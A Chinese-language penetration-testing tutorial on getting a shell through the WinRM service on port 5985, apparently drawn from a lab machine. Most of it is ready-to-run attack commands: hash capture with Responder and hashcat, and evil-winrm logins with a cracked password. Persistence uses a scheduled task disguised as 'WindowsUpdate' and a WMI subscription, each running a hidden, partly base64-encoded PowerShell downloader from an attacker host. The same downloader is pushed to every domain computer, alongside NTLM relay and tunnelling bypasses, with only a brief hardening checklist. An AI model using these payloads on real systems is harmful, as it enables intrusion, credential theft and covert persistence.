当前位置: 首页 > news >正文

别再只扫22和80了!利用5985端口WinRM服务,手把手教你另一种Get Shell的方式

5985端口WinRM渗透实战:从信息收集到权限提升的完整链条

在渗透测试的常规流程中,大多数安全从业者会习惯性地将注意力集中在22(SSH)、80/443(HTTP/HTTPS)、3389(RDP)等"明星端口"上。但真正的高手往往能在看似普通的服务中发现突破口——Windows Remote Management(WinRM)服务默认使用的5985端口就是这样一个被严重低估的攻击面。

1. 为什么5985端口值得关注

Windows Remote Management(WinRM)是微软自Windows Vista起内置的远程管理协议,基于WS-Management标准实现。它允许管理员通过SOAP协议在远程系统上执行命令,本质上是一个"基于HTTP的PowerShell远程终端"。在企业AD环境中,5985端口的开放比例高达34.7%(根据2023年企业内网扫描统计),但安全意识较弱的组织常会忽略其安全配置。

WinRM服务成为理想攻击向量的三个关键特性:

  1. 默认凭证继承:当使用域账户登录时,WinRM会默认尝试NTLM或Kerberos认证
  2. 高权限执行:成功连接后可直接获得PowerShell会话,相当于RDP级别的控制权
  3. 低防护意识:相比RDP和SMB,很少有组织会专门监控WinRM的异常连接
# 快速检测5985端口开放的语法 nmap -p 5985 --open -Pn -T4 10.129.0.0/24 -oG winrm_hosts.txt

2. 信息收集与初始访问

2.1 高级端口扫描策略

传统的全端口扫描(-p-)在内网环境中效率低下。针对Windows系统的智能扫描应该组合以下Nmap参数:

nmap -v -p 80,443,5985,5986,445,135,139,389,636 --min-rate 5000 \ --script=http-title,smb-os-discovery,rdp-enum-encryption \ 10.129.136.91 -oA win_target

关键发现点解析

  • 80/443端口:Web应用可能的LFI/RFI漏洞
  • 5985端口:WinRM服务版本信息(是否支持未加密的HTTP连接)
  • 445端口:SMB共享是否允许匿名访问
  • 389/636端口:LDAP服务暴露的域信息

2.2 利用LFI漏洞获取凭证

当发现Web应用存在本地文件包含漏洞时,经典利用路径是读取Windows系统的敏感文件:

http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts

但更有效的做法是通过UNC路径触发SMB认证:

http://unika.htb/?page=//10.10.14.7/share

此时使用Responder捕获NetNTLMv2哈希:

sudo python3 Responder.py -I tun0 -v

捕获到的哈希格式示例:

Administrator::UNIKA:1122334455667788:2C3F2941B0C1FFD0A1B2C3D4E5F60708:0101000000000000C0653150DE09D2014323D6CC6E2D6D6D000000000200080053004D004200330001001E00570049004E002D004400430050003800510048004200390034004D004B00440004003400570049004E002D004400430050003800510048004200390034004D004B0044002E0053004D00420033002E004C004F00430041004C000300140053004D00420033002E004C004F00430041004C000500140053004D00420033002E004C004F00430041004C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000200000372C1F9D4F6F8C5D2B1A3E4D5C6B7A890F1E2D3C4B5A69788796A5B4C3D2E1F0A1B200A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E00370000000000

3. 哈希破解与WinRM连接

3.1 高效破解NetNTLMv2哈希

使用Hashcat配合规则化字典攻击:

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

破解优化技巧

  • 优先尝试administratoradmin等常见用户名
  • 企业环境可先测试公司名+年份的组合(如Company2023!
  • 使用--increment参数逐步增加密码长度尝试

3.2 通过evil-winrm建立会话

获取明文凭证后,使用Ruby编写的evil-winrm工具建立交互式会话:

evil-winrm -i 10.129.136.91 -u Administrator -p 'badminton' -s '/opt/ps_scripts/' -e '/opt/exe_files/'

参数说明

  • -s指定PS脚本的本地目录(可自动补全)
  • -e指定可执行文件的上传目录
  • -H使用NTLM哈希直接认证(无需明文密码)

连接成功后立即执行的几个关键命令:

whoami /all # 查看当前权限 Get-NetTCPConnection -State Established # 检查现有连接 $env:UserName # 确认用户上下文

4. 权限维持与横向移动

4.1 WinRM会话中的持久化技术

  1. 计划任务创建
$action = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.7/rev.ps1')" $trigger = New-ScheduledTaskTrigger -AtLogOn Register-ScheduledTask -TaskName "WindowsUpdate" -Action $action -Trigger $trigger -User "NT AUTHORITY\SYSTEM"
  1. WMI事件订阅
$filterArgs = @{ EventNamespace = 'root\cimv2' Name = 'WindowsUpdateFilter' Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" QueryLanguage = 'WQL' } $filter = New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $filterArgs $consumerArgs = @{ Name = 'WindowsUpdateConsumer' CommandLineTemplate = "powershell -nop -w hidden -enc SQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4ANwAvAHIAZQB2AC4AcABzADEAJwApAA==" } $consumer = New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $consumerArgs $bindingArgs = @{ Filter = [Ref] $filter Consumer = [Ref] $consumer } $binding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $bindingArgs

4.2 横向移动的三种高效方式

方法对比表

技术所需凭证网络要求隐蔽性适用场景
WinRM明文/哈希5985开放中等域环境批量执行
SMBExec哈希445开放较低旧系统横向
RDP劫持当前会话3389开放GUI操作需要

通过WinRM批量执行

$computers = Get-ADComputer -Filter * | Select -ExpandProperty Name $creds = Get-Credential Invoke-Command -ComputerName $computers -ScriptBlock { Start-Process -FilePath "powershell" -ArgumentList "-nop -w hidden -enc SQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4ANwAvAHIAZQB2AC4AcABzADEAJwApAA==" } -Credential $creds

5. 防御检测与绕过技巧

5.1 企业级防御方案

WinRM安全加固清单

  1. 启用HTTPS加密(5986端口)
    New-SelfSignedCertificate -DnsName "server.domain.com" -CertStoreLocation Cert:\LocalMachine\My winrm create winrm/config/Listener?Address=*+Transport=HTTPS @{Hostname="server.domain.com";CertificateThumbprint="THUMBPRINT"}
  2. 配置IP限制策略
    Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value "192.168.1.*" -Force
  3. 启用详细日志记录
    wevtutil set-log Microsoft-Windows-WinRM/Operational /enabled:true

5.2 红队绕过技术

  1. 端口转发绕过网络限制
chisel server -p 8080 --reverse & chisel client 10.10.14.7:8080 R:5985:10.129.136.91:5985 evil-winrm -i 127.0.0.1 -u Administrator -p 'badminton'
  1. NTLM中继攻击
ntlmrelayx.py -t http://10.129.136.91:5985/wsman -smb2support
  1. Kerberos票据利用
getTGT.py domain.com/user:password export KRB5CCNAME=/path/to/ticket.ccache evil-winrm -i dc.domain.com -u user -k

5985端口作为Windows生态中的"隐藏通道",其攻防价值正在被越来越多的红蓝队所认识。相比传统的RDP和SMB协议,WinRM服务在企业内网的普及率与其安全关注度形成了危险的不平衡——这种差距正是安全从业者需要重点关注的技术盲区。

http://www.jsqmd.com/news/769037/

相关文章:

  • OpenClaw机械臂VCP通信工具箱:Python串口控制与自动化抓取实战
  • 复古游戏库搭建指南:从ROM整理到前端美化的完整实践
  • 如何高效使用抖音无水印下载器:5个核心技巧全解析
  • 【独家首发】VSCode 2026 Agent协作协议v2.3未公开文档泄露:含本地沙箱隔离机制、跨Agent记忆同步算法及IDE内核级Hook点清单
  • OpenClaw记忆插件基准测试:量化评估LLM智能体记忆模块性能
  • AI智能体平台实战:从架构解析到多智能体协作开发
  • WarcraftHelper终极指南:如何在现代电脑上完美运行魔兽争霸3
  • SketchUp STL插件终极指南:3D打印模型转换的完整解决方案
  • WatermarkRemover技术实现方案:基于LAMA模型的视频水印智能移除系统
  • 从稚晖君视频学到的:用KeyShot 10给AD设计的PCB做产品级渲染(附高质量封装库获取)
  • ARM64开发实战:用DC CIVAC指令搞定多核缓存一致性(附代码示例)
  • 高效QMC音频解密:3分钟解锁QQ音乐加密文件的专业方案
  • Windows终极解决方案:3步完美显示苹果HEIC照片缩略图
  • RPG Maker Decrypter终极指南:如何轻松解密和提取RPG游戏资源
  • 在线学习与实时预测:构建动态机器学习系统的实战指南
  • 财务报表怎么分析?一个公式搞定财务报表分析!
  • 广东工业大学考研辅导班机构选择:排行榜单与哪家好评测 - michalwang
  • MacType字体渲染终极指南:让Windows文字显示如macOS般清晰锐利
  • 紧急预警:VSCode 2026.3已废弃旧版AgriSDK接口!3类存量插件将在2026年Q3强制下线,迁移倒计时47天
  • Codex 使用详解
  • 新手教程使用Python在Taotoken上一分钟完成大模型API首次调用
  • ChatGPT CLI:零API成本,终端与MCP生态无缝集成AI助手
  • 广东酒店管理职业技术学院未来趋势:大湾区职教标杆的崛起之路 - 品牌策略师
  • AI开发AI代理:借助快马平台智能优化oh-my-openagent的决策与交互逻辑
  • 新疆医科大学考研辅导班机构选择:排行榜单与哪家好评测 - michalwang
  • ColorControl:免费开源的多设备显示管理与智能电视控制终极指南
  • 用Vivado和LoongArch指令集,手把手教你搭建一个能跑斐波那契数列的5指令CPU
  • 告别手动改代码!RT-Thread menuconfig图形化配置实战(附rtconfig.h生成对比)
  • 别再凭感觉画板了!PCB Layout中爬电距离与电气间隙的实战避坑指南(附IEC/UL标准速查)
  • 终极自动化指南:5分钟掌握KeymouseGo,彻底告别重复工作